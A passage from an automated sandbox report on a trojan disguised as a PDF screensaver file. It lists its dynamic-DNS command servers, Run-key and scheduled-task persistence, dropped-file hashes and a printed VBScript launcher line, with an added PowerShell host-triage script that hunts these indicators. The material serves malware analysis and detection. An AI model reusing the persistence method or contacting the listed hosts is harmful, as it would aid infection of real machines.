    december2nd.ddns.net: Avira URL Cloud 100% (malware)
    december2n.duckdns.org: Avira URL Cloud 100% (malware)

Contacted domains (name, IP, active, malicious, reputation):
    december2nd.ddns.net: 212.193.30.230, active: true, malicious: true, reputation: unknown
    december2n.duckdns.org: 212.193.30.230, active: true, malicious: true, reputation: unknown

Contacted URLs (name, malicious, antivirus detection, reputation):
    december2nd.ddns.net: malicious: true; Avira URL Cloud: malware; reputation: unknown
    december2n.duckdns.org: malicious: true; Avira URL Cloud: malware; reputation: unknown

URLs from memory and binaries (name, source, malicious, reputation):
    https://www.autoitscript.com/autoit3/ (004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp): malicious: false; reputation: high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp): malicious: false; reputation: high

Contacted IPs (IP, domain, country, ASN, ASN name, malicious):
    212.193.30.230: december2nd.ddns.net, Russian Federation, AS57844 SPD-NETTR, malicious: true
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:798041
              Start date and time:2023-02-03 17:50:31 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 16m 3s
              Hypervisor based Inspection enabled:false
              Report type:light
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:39
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:004349256789197.pdf.scr.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@43/45@28/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 99.7% (good quality ratio 92.4%)
              • Quality average: 78.8%
              • Quality standard deviation: 29.5%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240s for sample files taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
17:51:58 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
17:52:03 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
17:52:06 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
17:52:06 | API Interceptor | 1646x Sleep call for process: RegSvcs.exe modified
17:52:06 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
17:52:15 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
17:52:25 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
17:52:33 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
17:52:48 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
17:52:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
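The timeline above records the persistence this sample installs: Run-key values named Chrome, AutoUpdate and DHCP Monitor (written to HKLM, the 64-bit HKCU view and HKCU) that point into %TEMP% and Program Files (x86), a Run value that launches Update.vbs, and two scheduled tasks, DHCP Monitor and DHCP Monitor Task, that start a RegSvcs.exe copy from %TEMP% and dhcpmon.exe. The PowerShell script below is an added host-triage example; it is not part of the Joe Sandbox report and not code from the sample. It re-checks a live Windows host for that pattern. The value names, task names, paths, domains, IP address and SHA-256 it carries are copied from this report; the heuristics (execution from AppData or Temp, a VBScript or script host, RegSvcs.exe outside the .NET Framework directory, a double file extension) and every function name are this example's own assumptions.

```powershell
# Added host-triage script; not part of the Joe Sandbox report or of the analysed sample.
# Re-checks a live Windows host for the persistence recorded in the report timeline:
# Run-key values (Chrome / AutoUpdate / DHCP Monitor) pointing into %TEMP% or Program Files (x86),
# scheduled tasks "DHCP Monitor" / "DHCP Monitor Task", a RegSvcs.exe copy outside the .NET
# Framework tree, and the two dynamic-DNS C2 names. Run elevated; needs the ScheduledTasks,
# DnsClient and NetTCPIP modules (Windows 8 / Server 2012 and later).

# Indicators copied from the report. A value name alone proves nothing ("Chrome" is common),
# so a name hit is only reported together with a path heuristic hit.
$IocRunValueNames = @('Chrome', 'AutoUpdate', 'DHCP Monitor')
$IocTaskNames     = @('DHCP Monitor', 'DHCP Monitor Task')
$IocPaths         = @('C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe')
$IocDomains       = @('december2n.duckdns.org', 'december2nd.ddns.net')
$IocIPs           = @('212.193.30.230')
$IocSha256        = @('576263FB3C88934EBDB0AA6071F3A980710C9DFD2A3D63D09B0AA76F1CAAC9E7')  # submitted sample
$PsNoiseProps     = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

# Heuristics (this example's own) describing why a command line resembles the sample's persistence.
function Get-SuspicionReasons {
    param([string]$Command)
    $reasons = @()
    if ([string]::IsNullOrWhiteSpace($Command)) { return $reasons }
    $c = $Command.ToLowerInvariant()
    if ($c -match '\\appdata\\(local|roaming)\\') { $reasons += 'executes from AppData' }
    if ($c -match '\\temp\\')                     { $reasons += 'executes from a Temp directory' }
    if ($c -match '\.vb[es](\s|"|$)' -or $c -match '\\[wc]script\.exe') { $reasons += 'VBScript / script host' }
    if ($c -match 'regsvcs\.exe' -and $c -notmatch '\\microsoft\.net\\framework') { $reasons += 'RegSvcs.exe outside the .NET Framework directory' }
    if ($c -match '\.(pdf|doc|docx|xls|xlsx|jpg|png)(\.(exe|scr|com|bat|vbs))+(\s|"|$)') { $reasons += 'double file extension' }
    foreach ($p in $IocPaths) { if ($c.Contains($p.ToLowerInvariant())) { $reasons += 'path matches report IOC' } }
    return $reasons
}

# First executable of a command line (quoted or not), so it can be hashed.
function Get-ExecutablePath {
    param([string]$Command)
    $t = $Command.Trim()
    if ($t.StartsWith('"')) { $end = $t.IndexOf('"', 1); if ($end -gt 1) { return $t.Substring(1, $end - 1) } }
    return ($t -split '\s+')[0]
}

function New-Finding([string]$Source, [string]$Command, [string[]]$Reasons) {
    $exe  = Get-ExecutablePath $Command
    $hash = $null
    if ($exe -and (Test-Path -LiteralPath $exe -PathType Leaf)) { $hash = (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash }
    if ($hash -and ($IocSha256 -contains $hash)) { $Reasons += 'SHA-256 matches report' }
    [pscustomobject]@{ Source = $Source; Command = $Command; SHA256 = $hash; Reasons = ($Reasons -join '; ') }
}

function Invoke-PersistenceHunt {
    # Run keys in both registry views, as the timeline shows HKLM, HKCU and HKCU64 entries.
    $runKeys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    )
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($PsNoiseProps -contains $p.Name) { continue }
            $cmd = [string]$p.Value
            $reasons = @(Get-SuspicionReasons $cmd)
            if (($reasons.Count -gt 0) -and ($IocRunValueNames -contains $p.Name)) { $reasons += 'value name matches report' }
            if ($reasons.Count -gt 0) { New-Finding "$key\$($p.Name)" $cmd $reasons }
        }
    }
    # Scheduled tasks: the sample registers two that start RegSvcs.exe / dhcpmon.exe.
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($a in $task.Actions) {
            if (-not $a.Execute) { continue }        # COM-handler actions carry no Execute path
            $cmd = ("$($a.Execute) $($a.Arguments)").Trim()
            $reasons = @(Get-SuspicionReasons $cmd)
            if ($IocTaskNames -contains $task.TaskName) { $reasons += 'task name matches report' }
            if ($reasons.Count -gt 0) { New-Finding "Task $($task.TaskPath)$($task.TaskName)" $cmd $reasons }
        }
    }
    # Network side: resolver cache and live TCP sockets against the report's C2 indicators.
    foreach ($e in (Get-DnsClientCache -ErrorAction SilentlyContinue)) {
        if (($IocDomains -contains ([string]$e.Entry).ToLowerInvariant()) -or ($IocIPs -contains [string]$e.Data)) {
            [pscustomobject]@{ Source = 'DNS cache'; Command = "$($e.Entry) -> $($e.Data)"; SHA256 = $null; Reasons = 'C2 name/IP from report' }
        }
    }
    foreach ($cn in (Get-NetTCPConnection -ErrorAction SilentlyContinue | Where-Object { $IocIPs -contains $_.RemoteAddress })) {
        [pscustomobject]@{ Source = "TCP, PID $($cn.OwningProcess)"; Command = "$($cn.RemoteAddress):$($cn.RemotePort) ($($cn.State))"; SHA256 = $null; Reasons = 'C2 IP from report' }
    }
}

Invoke-PersistenceHunt | Format-Table -AutoSize -Wrap
```

Every finding carries the reasons that triggered it, so a legitimate Run value that merely shares the name Chrome is not reported unless its command also executes from a user-writable location. The hash check only matters for the submitted sample's SHA-256 (the report's dhcpmon.exe and Temp RegSvcs.exe hashes are not given in this section), so a RegSvcs.exe found in %TEMP% is reported on its location, not on its hash.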
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):151
              Entropy (8bit):5.088165235670747
              Encrypted:false
              SSDEEP:3:FER/n0eFH5OerbJSRE2J5xAIzbgDU4AdjNerbJSRE2J5xAIzbgRoeqn:FER/lFHIe0i23fzbgDUPjNe0i23fzbg2
              MD5:A9A3C2871C5B661CFE0BD95B12693457
              SHA1:E8C39E23AE2DF49D7D9C461BE91C20FF1B4FDB44
              SHA-256:C64E277FBBCB7B0B7693A0EA11925A1AB3C966723A97A2381851EE269DA571AF
              SHA-512:44B1D4E5CF629E6A91B32721B9B7E2939455DB0ACAEC08DE68E8512CB0C6503BE549E09C3E28E0EAFCB32812B72E398EF471FB39BDF3EF4E15AB3AF58BA63CDE
              Malicious:false
              Reputation:unknown
              Preview:CreateObject("WScript.Shell").Run "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC"
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:data
              Category:dropped
              Size (bytes):121649618
              Entropy (8bit):7.0364100465274175
              Encrypted:false
              SSDEEP:196608:NFJK4YyNlildTiCgW6hwsT3mYfb4tMV6zlR5+gmtZtQJYuPng/Kj8nGj3AExAcYc:g
              MD5:004A5D8E43630E4D5DB63A5BB6159FCC
              SHA1:285BD4A523DC7B93B0EFB86978D0FA4591E45D85
              SHA-256:9D5D8B0428D63CC43A9503591D94C62CD1606C26732735A2A950CA63147B367B
              SHA-512:F7756E3FB6B82FB75C53B6CAB6BA5E97B7774ED61F41549E222038FB3C745BD2784FC85D8ECC4DAAD7F09139A73C8E44863BC07E226AF71B4292609774034CD4
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):407473
              Entropy (8bit):4.048588207938584
              Encrypted:false
              SSDEEP:
              MD5:48F9952AAAFE4CA15D39581E78889AC0
              SHA1:569F6FB010FEFB412192A968784DB355B8311853
              SHA-256:7F322D3E2096AA1F60CBF945595F155314D434A4FDD5A35640DF9363570FE666
              SHA-512:BAE18549694F7D75F24D057F21380C30CA6F9C7579EE3D4EAD2F4CAFF92E541797ABFA970688170501DE1EA378B5F0CAF071B46BD7C28030D6C15EFBA5296B87
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):588
              Entropy (8bit):6.213002454543603
              Encrypted:false
              SSDEEP:
              MD5:F821802654AA671984C34C52D1CDCFD4
              SHA1:D4E04EFDB9402CA2090A8602C54B84400ABC71A1
              SHA-256:4BB1B7DE0C409D831CE769B0ACB7ED9F753710B487D3B6135C5758DD0AAFD86C
              SHA-512:8DAB9616753F29F84BAA87012F6FEA6A0185DF12BCE18D334DFF95AC77210EF25680EAD8FC034F60D0EBB40B4D78FA814902F1EE49519E813E9A91FFE3F36AAB
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):524
              Entropy (8bit):6.2118134349266025
              Encrypted:false
              SSDEEP:
              MD5:046256AD551F6765F23E871E20A666A5
              SHA1:79FF6979F39E5DCFA15B81922E947B19B4A4D6B0
              SHA-256:08248EBE1BCE86EA542860C50CCD847580D22CB133A78D524B5D1C714CBBB331
              SHA-512:57BB2D43E8263F6B2F9D37A609940B7BB8B8A0C324451FAA78AD8A35264DA04D3461B58787C3632D7506D2F52D49032B20716FBB8060014FD098FE830F6820BA
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):607
              Entropy (8bit):6.201298305828523
              Encrypted:false
              SSDEEP:
              MD5:043E8B1857BEEABA3718A7F3847122D5
              SHA1:7BB750324587EDB34690AA0B789869B15406ECDD
              SHA-256:9524F0E243E06157AFAAD36B50DAF38166331029B5226C16543B2F7AEA1F4E2F
              SHA-512:D7F29E19A3162697D314DD98B3C11E1DDAE2768C79F7E25F96D36D38E5AC2FF0F15BB2DBE9A3F19AADF2430554865099B8F12C9B07C005C8E835CB16FFADA2FA
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):539
              Entropy (8bit):6.206196757309823
              Encrypted:false
              SSDEEP:
              MD5:6E72ACECBCA63A02F17F09893C4ECC5B
              SHA1:B667E4B9DD2659CF40784B523AB6ECAFC715C452
              SHA-256:B6C25984BEEC32852E2AB5E928F7099DE75BAED20852749A603ED89EFC219E63
              SHA-512:E1CF9C9DAA24A5B4099AE18DDB4E6E9B572ED9251E13BE0D804D3A35E9F0171EB4420921CFAB625058744209D9E6604FC370F1B365CDB60ABFFCEF162E366458
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.2074620354651575
              Encrypted:false
              SSDEEP:
              MD5:4BD4541ADFD4E488EACDFF04D29183BE
              SHA1:46FF43B901FE30FC60D07FD8F913BDB9B7C7756D
              SHA-256:0C5F56ABB0BC00576718A0554507D9068FB7E83E4E3B44FE5435371467AD160C
              SHA-512:58E109BC252B51DE3770B5062759158E359D47E51682E66D9E693585BB64E3425D54D3DB4EB3D95B43AE6B2D18F724480594885A363D29CE6DCC9C27436B613F
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):669
              Entropy (8bit):6.256842582335099
              Encrypted:false
              SSDEEP:
              MD5:D20C31B84E18489E4E27B1D5591E9F45
              SHA1:7F6D3CD2F26E1E458C91FA23BB2E489737A6286D
              SHA-256:A8E5BE91B492A1B25ED40D3C9BF20B9CACF662B6C15180A77BF3033C073C292E
              SHA-512:549140F915E92F090AD58571EB544E7D18AB6E4E0D2BEABAF036D95884B12E3FD547474DBF8F793E7691D4D9F1709CF333C41E3D73FFB29791B174D1EF3A122C
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):1357068
              Entropy (8bit):6.400387425104881
              Encrypted:false
              SSDEEP:
              MD5:797174324A2A71F55AD4E89DA918B52D
              SHA1:0B75AD2A9E182993A220D261F74B68D70F97398A
              SHA-256:AED1188582A5A13FF39A6C9D324BC9A5D0A8CEDB56814B1017CC35D2A6F3548E
              SHA-512:F9A1799F74EF31AB2958463D9557AD3A65D51112F90EC64674DD5675115997019248F5C920E8DEB50A12A90BA2A6EF40D2C5F00C98B3ABD4D3E081866F37B7FC
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 26%
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):578
              Entropy (8bit):6.208581968969855
              Encrypted:false
              SSDEEP:
              MD5:18D244E2DA84E8B08621DB3D2C714ECE
              SHA1:7C03348C271C40E02418075E5678A5906576C280
              SHA-256:592477758051ED96DBCF1300248BD10B1F800287D7E0AFD8012A7D4B446E4C91
              SHA-512:671FEA619563C02F32E0458CE15062BE3F9404A795F763EDEB2934CA0DA24B5487AE721D9CA1B4A5B056E8FB1B8684EF45F7E90519DD6EBF4C90143E01A628E5
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):701
              Entropy (8bit):6.217263929891554
              Encrypted:false
              SSDEEP:
              MD5:03224F8D3517549E40641731A5211E8D
              SHA1:C9FC0CCFAB73A464DABE64D52737D86ED47DE581
              SHA-256:9FA367942F2C23664CBC8498A334C716F26BF2C1732A5C9490876CBAA3944F6E
              SHA-512:B0E1BE6303B1BB5426F9F0F40AF342544CDD393783F87108B63C5216FAB128FE5AB25561515CECAEE0FA1572A5C8227B08C49E11E18ECFDC08E58A653DE9A743
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):549
              Entropy (8bit):6.213056313966432
              Encrypted:false
              SSDEEP:
              MD5:9FFFAA49E0C74C82366B031E8D873414
              SHA1:B71020F66B4D55066C04A5504425649B93DC78F2
              SHA-256:251A281F2856F3CFEC0FD3472028E9ED3AEB5EF558CCAC820EA67C9E8524FE6A
              SHA-512:3E103990CFD5057E9D9B9095805227B226DA59DA4974E237046D1D98653E3C67629DC74C6C0647FFE0A9E8EFAE2F4999E1C2C9EFB2B5C8081879D895CC9A41AA
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):620
              Entropy (8bit):6.222206344450024
              Encrypted:false
              SSDEEP:
              MD5:DDC613AF180A41E7B305D2D26E77AED6
              SHA1:682E34C9A6D1A245798B44BE73D47399CBFC60A3
              SHA-256:A0B85CAEE9398B79BB9D7BE632FC2CA14A4E53204A8ECCA296C8CF25C9BAC7F4
              SHA-512:B6A7931AC3281005313641C9D1C3472E4E4646BC63A7B559A6CA911ACD959CF9D07B802E8F919F8DDAA995E61F0B9DEB57BA3C21EE9886D03360C6B1E905E0FB
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):636
              Entropy (8bit):6.245326274571603
              Encrypted:false
              SSDEEP:
              MD5:A70B8C03B325053D2F0A2051E3D566B7
              SHA1:E1A9CB6F876034FCD418A94D1A201DFE26631399
              SHA-256:CA9CD4CDD48DFFDDE0F6418CD08766E00E842634CC615D636540ED30CFD3C433
              SHA-512:8C5F1A8DF42EE671DE09C3D86F1B579B424C4D78E719EF96EE2B88B07DA04FAA1F0F92CDCDE4B4A25A616BD0F6F134A8636C5701E78D3747CBAA9A5F901E2B8B
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):46328
              Entropy (8bit):7.200808834838652
              Encrypted:false
              SSDEEP:
              MD5:E3A50ED6D88E9A241C5F8A38C74B75A5
              SHA1:DF2C2FAA8BB5C3D9B14D9A8CDBBF7E86F4F5034A
              SHA-256:E65F26F6FDABF467EE52D7466856CC152B9ECC355596FEBB34E5910413A2CD6D
              SHA-512:4714A1F10420EA1BED67ABA05B4D1E45D48D2BC2944CCCA93F1CB5F7B32F23147D869B6865E4B0A5D703D1F886C650907A4633EBDE9455A84BCC8065DEA18C77
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):632
              Entropy (8bit):6.226044296719832
              Encrypted:false
              SSDEEP:
              MD5:32C554BAC7052BFF5BBB4E69058154E4
              SHA1:A46476E21653B14423F462D7C3CF6EC16199A204
              SHA-256:B4BFAAF128F118F5B45AAEDC20246B3517926363C75DA64EBEF63D648FCBAC08
              SHA-512:D74B0DEDAC5A006E06CE5A9D7F91C1AC4FE5E4D355EC7A9F8F8683CDB83D4E584A47937D8B3C58198FC85A4C2F14261953B527E79204A53E64C3F6B9B3FB51BD
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):535
              Entropy (8bit):6.223028920694769
              Encrypted:false
              SSDEEP:
              MD5:C32315E0688E0A5633A0D2DCE4CC9629
              SHA1:F581EE1E102167C604CF366415105BB9314CF4B5
              SHA-256:E92602D9F89967C956CA83477F419BF1F5F917D95E3C0501BD6EA1BF76E85808
              SHA-512:F5FFC31716F87A024883845607BE750FF782F114C3EC76378F6A78255857A47C9929EBDDBC9325CBE1D35887FAED615F1874320326C40215EFBE2A99193E2BF4
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):656
              Entropy (8bit):6.264380029804187
              Encrypted:false
              SSDEEP:
              MD5:194DE31777DD53F9E29A06776AE6C1B3
              SHA1:A4FF9EF9C4962628810B38368D4EFB13F53449D7
              SHA-256:90EA34BF2E24E4AD5DF9FD37CEA36ABB7784931028F401F98A2E6C2A10B5583E
              SHA-512:637EAED24EB4EF8A4EE96BFAF11524901799DC8FBFD2DFDB3B478521B99BE49D056A9745388AC29A70A54390A449FC493B6F9CA5E00095DBDB192FA236B1C9B1
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):584
              Entropy (8bit):6.2507180834396046
              Encrypted:false
              SSDEEP:
              MD5:F87E4604F5916FF6A25186B0B504E681
              SHA1:DB2989E8ED40A5CEED078473341C5D8B8FE4E0F7
              SHA-256:0A8B1D99032C6B90054E5ADF89EFA61D005B0F3E12DA48905051067ED906D529
              SHA-512:9CDD4285C8B9CF1C90BD9A73071C839D933EE44149E8CE689AA1ADE39056EAFD9CBBF348AC8BD5340A2DF7E8D91AE0529E872C377FA90DE46FB698395A8D9152
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):733
              Entropy (8bit):6.231676397919319
              Encrypted:false
              SSDEEP:
              MD5:DD66397E376C91D7F01F231D944C8DF1
              SHA1:8C2F651AF93B763090395AED51C2E551942DFEC3
              SHA-256:FF281486360AD0A5E071BFAE276626E80D212EA65AFBD3CA7784B0F4B3570D09
              SHA-512:7E81472C48AF0D9712068FB66500253F673629A313AF680071E8C8C961CB27D589F249AD688292259E384E4BCFC48161E901C6CB27659E16B42242C1E1CF2238
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):530
              Entropy (8bit):6.220144182081156
              Encrypted:false
              SSDEEP:
              MD5:7FFF06723AFA9FC84547B1E2D379AABD
              SHA1:4929D1A9298E365087EFDD2B019C05F6CF750E70
              SHA-256:B26D7992C99861FEE8E8E86614AF8A0B145AE8F2AEA197CE6BA8408EF07B9698
              SHA-512:538759223E6C9DEFE1F50B1AFF4C44CDDAF21C0712C51271E44431683C6E7F632F57800909CB48B7A0C26A02DDE11549FD996DFEDE8B50C97731CCB77B24EA3B
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):581
              Entropy (8bit):6.223635486991566
              Encrypted:false
              SSDEEP:
              MD5:B74B8AC3F96B39CC953D1BA34CB751DD
              SHA1:48050CB8EA9C5A3B5108706C987799673A1454FC
